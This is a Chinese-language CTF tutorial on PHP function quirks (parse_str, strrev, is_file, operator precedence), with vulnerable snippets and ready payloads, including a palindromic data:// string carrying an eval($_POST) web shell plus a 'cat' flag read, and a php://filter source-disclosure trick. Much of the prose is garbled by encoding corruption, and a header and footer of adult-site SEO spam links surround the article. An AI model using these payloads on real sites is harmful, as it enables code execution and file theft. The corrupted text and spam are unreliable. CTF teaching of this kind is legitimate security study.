av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術(shù)文章
文章詳情頁

CTF中的PHP特性函數(shù)解析之下篇

瀏覽:209日期:2022-06-06 15:52:34
目錄
  • 前言
  • parse_str
  • strrev
  • is_file
  • 優(yōu)先級(jí)問題
  • 結(jié)語

前言

上篇文章講的進(jìn)階一些的PHP特性不知道大家吸收的怎么樣了,今天作為本PHP特性函數(shù)的最后一篇,我也會(huì)重點(diǎn)介紹一些有趣的PHP特性以及利用方法,下面開始我們今天的內(nèi)容分享。

parse_str

parse_str()這個(gè)函數(shù)會(huì)把查詢字符串解析到變量中。那么我們?nèi)绾卫盟奶匦阅兀覀兛聪旅娴睦樱?/p>

<?phphighlight_file(__FILE__);error_reporting(0);include("flag.php");if(isset($_POST["v1"])){    $v1 = $_POST["v1"];    $v3 = $_GET["v3"];       parse_str($v1,$v2);       if($v2["flag"]==md5($v3)){   echo $flag;       }} ?>

分析一下代碼要求我們什么,看最后要我們數(shù)組v2等于md5(v3),而根據(jù)上面代碼v2則是由該函數(shù)經(jīng)過v1后賦值給的,那我們解題的思路就有了,利用parse_str() 函數(shù)的特點(diǎn)將v2[flag]的值覆蓋,那么具體要怎樣做呢?

先對(duì)數(shù)字5進(jìn)行md5加密:

<?php$b=md5("5");echo $b;// e4da3b7fbbce2345d7772b0674a318d5?>

之后再?gòu)膙1傳入我們的值即可完成繞過:

Payload:GET:v3=5POST: v1=flag=e4da3b7fbbce2345d7772b0674a318d5

strrev

這個(gè)函數(shù)還是很好理解的,就是將字符串進(jìn)行翻轉(zhuǎn),曾經(jīng)遇到過考察這個(gè)的題目覺得很有趣分享給大家,我們先看代碼:

highlight_file(__FILE__);    $file = $_POST["file"];    if(isset($file)){if(strrev($file)==$file){    include $file;}

代碼很簡(jiǎn)單,第一個(gè)是高亮代碼沒有什么用,要我們傳入file而且要使回文數(shù)等于它本身并且還要考慮如何進(jìn)行攻擊,是不是不太好想,這里使用php里面的data協(xié)議,該協(xié)議可以進(jìn)行寫入數(shù)據(jù),而且?>閉合后可以加任意字符不會(huì)受別的影響。于是我們構(gòu)造代碼:

data://text/plain,<?php eval($_POST[1]);?>>?;)]1[TSOP_$(lave php?<,nialp/txet//:atad&1=echo `cat /f1agaaa`;

可以看到思路還是挺巧妙的。

is_file

該函數(shù)檢測(cè)是不是一個(gè)常規(guī)的文件類型,在CTF中也出過繞過這個(gè)函數(shù)的題目,下面我們先看看代碼:

<?phphighlight_file(__FILE__);error_reporting(0);function filter($file){    if(preg_match("/../|http|https|data|input|rot13|base64|string/i",$file)){die("hacker!");    }else{return $file;    }}$file=$_GET["file"];if(! is_file($file)){    highlight_file(filter($file));}else{    echo "hacker!";} ?>

分析一下filter函數(shù)過濾了很多關(guān)鍵字符串對(duì)我們的輸入進(jìn)行限制,最后還不能讓is_file檢測(cè)出來是文件,那我們要怎樣讀取flag.php文件呢,看最后有個(gè)高亮file的操作,這里就是利用點(diǎn),我們要讓其等于flag文件,于是需要繞過:

這里 根據(jù)特性is_file不會(huì)識(shí)別php偽協(xié)議,于是我們構(gòu)造下面代碼:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

這樣傳入即可繞過檢測(cè)。

優(yōu)先級(jí)問題

在php里存在以下優(yōu)先級(jí)特性:

&&與||的優(yōu)先級(jí)高于=,而&&優(yōu)先級(jí)高于||

=的優(yōu)先級(jí)高于and與or

這里也可以作為考點(diǎn)來考,我們看下面代碼:

<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET["username"]) && isset($_GET["password"]) && isset($_GET["code"])){    $username = (String)$_GET["username"];    $password = (String)$_GET["password"];    $code = (String)$_GET["code"];    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){if($code == "admin"){    echo $flag;}     }}

我們需要傳入三個(gè)參數(shù),之后進(jìn)行類型的強(qiáng)制轉(zhuǎn)換,再通過判斷語句,最后需要code參數(shù)等于admin方可解題,根據(jù)優(yōu)先級(jí)原則,所以當(dāng)?shù)谝粋€(gè)判斷條件為true時(shí),直接跳過第二個(gè)條件然后判斷第三個(gè)條件,可能有一些繞,只要username=admin為真值,code=admin輸出flag,于是構(gòu)造payload:

?code=admin&password=1&username=admin

結(jié)語

本文到這就結(jié)束了,這篇文章講了幾個(gè)比較有趣而且有一些難度的特性知識(shí),不知道大家吸收的咋樣了,當(dāng)然PHP特性遠(yuǎn)沒有這么少,更多關(guān)于CTF PHP特性函數(shù)的資料請(qǐng)關(guān)注其它相關(guān)文章!

標(biāo)簽: PHP
主站蜘蛛池模板: 九色91| 日韩精品无 | 精品视频网| 国产超碰人人模人人爽人人添 | 国产精品五区 | 中文字幕三级 | 久久免费视频观看 | 看逼网站 | 91丨九色丨蝌蚪丨丝袜 | 97中文字幕| 欧美日本一区 | 日本a视频 | 午夜黄色大片 | 亚洲一区精品视频 | 四虎免费在线观看 | 91们嫩草伦理 | 九色精品| 久久99久久久| 国产无遮挡又黄又爽又色 | 一区二区亚洲 | 日韩高清在线播放 | 成人欧美视频 | 国产伦精品| 黑人精品一区二区 | av黄色大片 | 国产成人免费在线观看 | 精品亚洲一区二区三区四区五区 | 亚洲69| 亚洲视频在线观看免费 | 福利视频一区 | 亚洲三级在线播放 | 亚洲综合网站 | 不卡日本 | 亚洲a视频 | 岛国精品在线播放 | 日韩黄色网址 | 久久91视频 | 亚洲第一区视频 | 欧美激情一区二区 | 人人干人人草 | 色综合久久88色综合天天 |